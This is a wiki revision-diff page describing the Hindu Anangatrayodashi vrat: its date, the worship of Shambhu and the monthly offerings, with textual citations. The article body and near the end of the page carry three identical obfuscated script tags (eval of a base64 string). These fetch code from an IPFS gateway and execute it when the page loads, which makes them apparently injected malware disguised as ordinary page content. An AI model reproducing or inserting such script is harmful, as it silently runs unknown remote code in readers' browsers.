Difference between revisions of "अनङ्‌गत्रयोदशी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - ")</ref" to "</ref")
 
(6 intermediate revisions by 4 users not shown)
Line 1: Line 1:
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
*मार्गशीर्ष शुक्ल की [[त्रियोदशी]] को अनड़्गत्रयोदशी व्रत एक वर्ष के लिये किया जाता है।
+
*मार्गशीर्ष शुक्ल की [[त्रयोदशी]] को अनङ्‌गत्रयोदशी व्रत एक [[वर्ष]] के लिये किया जाता है।
 
*इस व्रत में [[शम्भू]] पूजा की जाती है।
 
*इस व्रत में [[शम्भू]] पूजा की जाती है।
*मार्गशीर्ष शुक्ल त्रियोदशी को नदी, तालाब, [[कुआँ]] या घर पर स्नान करके अनंग नर्मदेश्वर [[महादेव]] का [[गन्ध]], [[अक्षत]], [[पुष्प]], [[धुप]], [[दीप]] और [[नैवेद्य]] आदि उपचारों से पूजन करके व्रत करे।
+
*[[मार्गशीर्ष]] [[शुक्ल पक्ष|शुक्ल]] त्रयोदशी को नदी, तालाब, [[कुआँ]] या घर पर स्नान करके अनंग नर्मदेश्वर [[महादेव]] का [[गन्ध]], [[अक्षत]], [[पुष्प]], [[धूप]], [[दीपक|दीप]] और [[नैवेद्य]] आदि उपचारों से पूजन करके व्रत करे।
*प्रत्येक मास में अनंग (शम्भु के रूप में) विभिन्न नामों से<ref>(यथा—स्मर की पूजा माघ में)</ref> एवं विभिन्न पुष्पों एवं नैवेद्य से पूजित होते हैं।  
+
*प्रत्येक मास में अनंग<ref>शम्भु के रूप में</ref>विभिन्न नामों से<ref>यथा - स्मर की पूजा [[माघ]] में</ref> एवं विभिन्न पुष्पों एवं नैवेद्य से पूजित होते हैं।  
*माधवकृत कालनिर्णय<ref>(278); [[गरुड़ पुराण]] (153)</ref> पूर्वविदा ली जाती है।<ref>हेमाद्रि व्रतखण्ड  (2, 1—8, भविष्योत्तर0 से उद्धरण)</ref>, <ref>गरुड़ पुराण (1|117)</ref>
+
*माधवकृत कालनिर्णय<ref>278); [[गरुड़ पुराण]] (153</ref> पूर्वविदा ली जाती है।<ref>हेमाद्रि व्रतखण्ड  (2, 1—8, भविष्योत्तर0 से उद्धरण</ref>, <ref>गरुड़ पुराण (1|117</ref>
*[[चैत्र]] या [[भाद्रपद शुक्ल]] की त्रियोदशी को वर्ष में प्रत्येक मास में या एक बार इस व्रत को करे व बारह विभिन्न नामों के साथ वस्त्र पर काम के चित्र की पूजा करे।<ref>हेमाद्रि व्रतखण्ड (2, 8–9, कालान्तर से उद्धरण); पुरुषार्थचिन्तामणि (323) एवं निर्णयसिन्धु (88)।</ref>
+
*[[चैत्र]] या [[भाद्रपद]] [[शुक्ल पक्ष|शुक्ल]] की त्रियोदशी को वर्ष में प्रत्येक मास में या एक बार इस व्रत को करे व बारह विभिन्न नामों के साथ वस्त्र पर काम के चित्र की पूजा करे।<ref>हेमाद्रि व्रतखण्ड (2, 8–9, कालान्तर से उद्धरण); पुरुषार्थचिन्तामणि (323) एवं निर्णयसिन्धु (88)।</ref>
 
*इस व्रत से शिव जी प्रसन्न होते हैं।
 
*इस व्रत से शिव जी प्रसन्न होते हैं।
 
==विशेषता==
 
==विशेषता==
मार्गशीर्षादि महीनों में [[मधु]], [[चन्दन]], [[न्यग्रोध]], [[बदरीफल]], [[करञ्ज]], [[अर्कपुष्प]], [[जामुन]], [[अपामार्ग]], [[कमलपुष्प]], [[पलास]], [[कुब्ज अपामार्ग]], [[कदम्ब]]- इनका पूजन और प्राशन में यथाक्रम उपयोग करे।  
+
मार्गशीर्षादि महीनों में [[मधु]], [[चन्दन]], [[न्यग्रोध]], [[बदरीफल]], [[करञ्ज]], [[अर्कपुष्प]], [[जामुन]], [[अपामार्ग]], [[कमल|कमलपुष्प]], [[पलास]], [[कुब्ज अपामार्ग]], [[कदम्ब]]- इनका पूजन और प्राशन में यथाक्रम उपयोग करे।  
  
 
{{संदर्भ ग्रंथ}}
 
{{संदर्भ ग्रंथ}}

Latest revision as of 12:36, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • margashirsh shukl ki trayodashi ko ananh‌gatrayodashi vrat ek varsh ke liye kiya jata hai.
  • is vrat mean shambhoo pooja ki jati hai.
  • margashirsh shukl trayodashi ko nadi, talab, kuaan ya ghar par snan karake anang narmadeshvar mahadev ka gandh, akshat, pushp, dhoop, dip aur naivedy adi upacharoan se poojan karake vrat kare.
  • pratyek mas mean anang[1]vibhinn namoan se[2] evan vibhinn pushpoan evan naivedy se poojit hote haian.
  • madhavakrit kalanirnay[3] poorvavida li jati hai.[4], [5]
  • chaitr ya bhadrapad shukl ki triyodashi ko varsh mean pratyek mas mean ya ek bar is vrat ko kare v barah vibhinn namoan ke sath vastr par kam ke chitr ki pooja kare.[6]
  • is vrat se shiv ji prasann hote haian.

visheshata

margashirshadi mahinoan mean madhu, chandan, nyagrodh, badariphal, karanj, arkapushp, jamun, apamarg, kamalapushp, palas, kubj apamarg, kadamb- inaka poojan aur prashan mean yathakram upayog kare.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. shambhu ke roop mean
  2. yatha - smar ki pooja magh mean
  3. 278); garu d puran (153
  4. hemadri vratakhand (2, 1—8, bhavishyottar0 se uddharan
  5. garu d puran (1|117
  6. hemadri vratakhand (2, 8–9, kalantar se uddharan); purusharthachintamani (323) evan nirnayasindhu (88).

any sanbandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>